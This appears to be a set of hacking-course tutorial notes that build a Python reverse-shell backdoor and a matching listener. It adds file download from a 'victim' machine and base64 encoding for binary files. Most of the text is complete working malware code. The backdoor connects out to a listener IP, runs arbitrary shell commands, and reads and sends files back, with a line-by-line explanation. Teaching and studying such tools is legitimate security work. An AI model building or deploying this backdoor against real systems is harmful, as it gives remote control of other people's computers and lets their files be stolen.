#File Download:
To transfer a file we need to:
- Read the file as a sequence of characters.
- Send this sequence of characters.
- Create a new empty file at destination.
- Store the transferred sequence of characters in the new file
As u can see in the image
we tried to open an image in note pad the file is actually a sequence of characters
#1st we are trying to send sample.txt which doesn't have any special character its a simple notepad file
#CODE: READ FILE_BACKDOOR
- #!/usr/bin/env python
- import socket
- import subprocess
- import json
- import os
- class Backdoor:
- def __init__(self, ip, port):
- self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- self.connection.connect((ip, port))
- def json_send(self, data):
- json_data = json.dumps(data)
- self.connection.send(json_data)
- def json_receive(self):
- json_data = ""
- while True:
- try:
- json_data = json_data + self.connection.recv(1024)
- return json.loads(json_data)
- except ValueError:
- continue
- def execute_system_command(self, command):
- return subprocess.check_output(command, shell=True)
- def change_working_directory_to(self, path):
- os.chdir(path)
- return "[+] Working directory has been changed" + path
- def read_files(self, path):
- with open(path, "rb") as file:
- return file.read()
- def run(self):
- while True:
- command = self.json_receive()
- if command[0] == "exit":
- self.connection.close()
- exit()
- elif command[0] == "cd" and len(command) > 1:
- command_result = self.change_working_directory_to(command[1])
- elif command[0] == "download":
- command_result = self.read_files(command[1])
- else:
- command_result = self.execute_system_command(command)
- self.json_send(command_result)
- my_backdoor = Backdoor("10.0.2.15", 4444)
- my_backdoor.run()
#line-32/33/34 =
- def read_files(self, path):
- with open(path, "rb") as file:
- return file.read()
#EXPLANATION
- def read_files(self, path):
So the first step is going to be reading the file from our backdoor.
So I'm going to implement a method and I'm going to call this method read_file.
And this will take self and the final path to read as inputs,
Now, the syntax to read the file is actually very, very similar to writing a file
- with open(path, "rb") as file:
we can use the 'with' keyword in order to open this file.
first argument is going to be the path to the file to open.
So this is going to be the path that we get as an input and then we're going to specify the method that
we want to open this file.
So we're going to put 'r' as the method of opening this file.
And 'b' I want to treat all the files as binary files.
Now you can use just 'r' if you just want to read normal text files,
but if you 'b', we will be able to read files as binaries.
So this will allow us to transfer normal files such as images and all of that and other text files.
Then we're going to say we want to open this file 'as file'
So this is the variable that we're going to use to reference the file that we opened.
- return file.read()
NOW We just want to read this file so we can read the file by doing 'file.read'
And what I want to do is I want to actually return the contents of this file.
So we're going to say I want to return the file that WE read.
#line-44/45 =
- elif command[0] == "download":
- command_result = self.read_files(command[1]
So we're going to do elif the first element of the command that the user sent is equal to download.
Then my command result is going to be self.read_files.
And the file that we want to read is going to be the second element of the command list
So when the person tries to download the file, they're going to type download, followed by the file
name that they want to download.
- download[0] & file name[1]
So the first element is going to be download and the second element is going to be the file name.
So we can access this by typing command.
And this will be the first element of the command list[1].
Now when the user enters download, followed by a file name.
This check will be true.
So we're going to call the read_file.
We're going to give you the file name as the path.
This will open the path as file it will read it and return it.
So it'll be captured by my command_result.
And then this will be sent back to my listener.
Now, the listener is going to receive this in the result variable in here,
- result = self.write_file(command[1], result)
and then it's going to be printed on my screen,
but I don't want this to be printed on my screen.
I want this to be downloaded as a file.
So now we have to do the final step, which is to create an empty file and put all of the result that we're going to get inside this file so that we will have an identical file to the file that exists on the
another side (listener).
#CODE: WRITE FILE_LISTENER
- #!/usr/bin/env python
- import socket
- import json
- class Listener:
- def __init__(self, ip, port):
- listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
- listener.bind((ip, port))
- listener.listen(0)
- print("[+]Waiting for incomming connection")
- self.connection, address = listener.accept()
- print("[+]Got a connection from" + str(address))
- def json_send(self, data):
- json_data = json.dumps(data)
- self.connection.send(json_data)
- def json_receive(self):
- json_data = ""
- while True:
- try:
- json_data = json_data + self.connection.recv(1024)
- return json.loads(json_data)
- except ValueError:
- continue
- def execute_remotely(self, command):
- self.json_send(command)
- if command[0] == "exit":
- self.connection.close()
- exit()
- return self.json_receive()
- def write_file(self, path, content):
- with open(path, "wb") as file:
- file.write(content)
- return "[+] Download sucessfull.."
- def run(self):
- while True:
- command = raw_input(">> ")
- command = command.split(" ")
- result = self.execute_remotely(command)
- if command[0] == "download":
- result = self.write_file(command[1], result)
- print(result)
- my_listener = Listener("10.0.2.15", 4444)
- my_listener.run()
#line-37-40 =
- def write_file(self, path, content):
- with open(path, "wb") as file:
- file.write(content)
- return "[+] Download sucessfull.."
#EXPLANATION
- def write_file(self, path, content):
So the first step is going to be WRITING the file
So I'm going to implement a method and I'm going to call this method write_file.
And this will take self and the final path to read as inputs,
Now, the syntax to read the file is actually very, very similar to writing a file
Now, this method will take the path. As the file name and the contents of the file to write again in order to write a file.
- with open(path, "wb") as file:
We're going to open the file that we want to open is something that doesn't exist.
So it's just going to give the path that we get as an input to this function.
And the method of opening this file, we want to write to this file,
so remember when we were reading,
we put an 'r' when we want to write,
we're going to put 'w'
and since this file is going to be sent as a binary file because it's being read as a binary file.
So we're going to type 'wb' for binary and we're going to reference this file 'as file'.
And then once this file is open, we're going to do file.write and what we want to write in this
file is whatever we get in the content variable as input to this function.
- return "[+] Download sucessfull.."
And finally, we're going to return a message saying.
Download successful.
#line-44/45 =
- if command[0] == "download":
- result = self.write_file(command[1], result)
Now whenever the user enters download, this will be sent to the back door,
the backdoor is going to be able to read the file and send its content.
The content is going to be received in the result.
So I'm going to add a check-in here by saying
- if command[0] == "download":
If the first element of my command is equal to download.
- result = self.write_file(command[1], result)
I want to write file, so we're going to do self.write_file and what
we want to write is whatever we get and the result.
So we want to right the result.
& the first element of the command = list command[1].
the result now is equal to whatever is returned from my download file.
And then this will be printed on the screen to the person using the listener.
if this got cheak this will be the result
so result = self.write_file(command[1], result)
#Now let's try to send an image or any other file which has a sequence of character!
#AS U CAN SEE WE FACE A PROBLEM!! WHILE WE TRY TO DOWNLOAD THE IMAGE [GO THROUGH THE IMAGE]
We use base64 so that it could encode and decode the file
#CODE: IMPLEMENTING_ BASE64_IN_LISTENER
- #!/usr/bin/env python
- import socket
- import json
- import base64
- class Listener:
- def __init__(self, ip, port):
- listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
- listener.bind((ip, port))
- listener.listen(0)
- print("[+]Waiting for incomming connection")
- self.connection, address = listener.accept()
- print("[+]Got a connection from" + str(address))
- def json_send(self, data):
- json_data = json.dumps(data)
- self.connection.send(json_data)
- def json_receive(self):
- json_data = ""
- while True:
- try:
- json_data = json_data + self.connection.recv(1024)
- return json.loads(json_data)
- except ValueError:
- continue
- def execute_remotely(self, command):
- self.json_send(command)
- if command[0] == "exit":
- self.connection.close()
- exit()
- return self.json_receive()
- def write_file(self, path, content):
- with open(path, "wb") as file:
- file.write(base64.b64decode(content))
- return "[+] Download sucessfull.."
- def run(self):
- while True:
- command = raw_input(">> ")
- command = command.split(" ")
- result = self.execute_remotely(command)
- if command[0] == "download":
- fix_blank = " ".join(command[1:])
- result = self.write_file(command[1], result)
- print(result)
- my_listener = Listener("10.0.2.15", 4444)
- my_listener.run()
#CODE: IMPLEMENTING_ BASE64_IN_BACKDOOR
- #!/usr/bin/env python
- import socket
- import subprocess
- import json
- import os
- import base64
- class Backdoor:
- def __init__(self, ip, port):
- self.connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- self.connection.connect((ip, port))
- def json_send(self, data):
- json_data = json.dumps(data)
- self.connection.send(json_data)
- def json_receive(self):
- json_data = ""
- while True:
- try:
- json_data = json_data + self.connection.recv(1024)
- return json.loads(json_data)
- except ValueError:
- continue
- def execute_system_command(self, command):
- return subprocess.check_output(command, shell=True)
- def change_working_directory_to(self, path):
- os.chdir(path)
- return "[+] Working directory has been changed" + path
- def read_files(self, path):
- with open(path, "rb") as file:
- return base64.b64encode(file.read())
- def run(self):
- while True:
- command = self.json_receive()
- if command[0] == "exit":
- self.connection.close()
- exit()
- elif command[0] == "cd" and len(command) > 1:
- command_result = self.change_working_directory_to(command[1])
- elif command[0] == "download":
- fix_blank = " ".join(command[1:])
- command_result = self.read_files(fix_blank)
- else:
- command_result = self.execute_system_command(command)
- self.json_send(command_result)
- my_backdoor = Backdoor("10.0.2.15", 4444)
- my_backdoor.run()
#EXPLANATION
We use we use to encode and decode in our backdoor and listener respectively
 |
| This is what base64 doing |
#Encoding and decoding explanation!
#Now next thing we will learn how to upload a file in victim's computer!
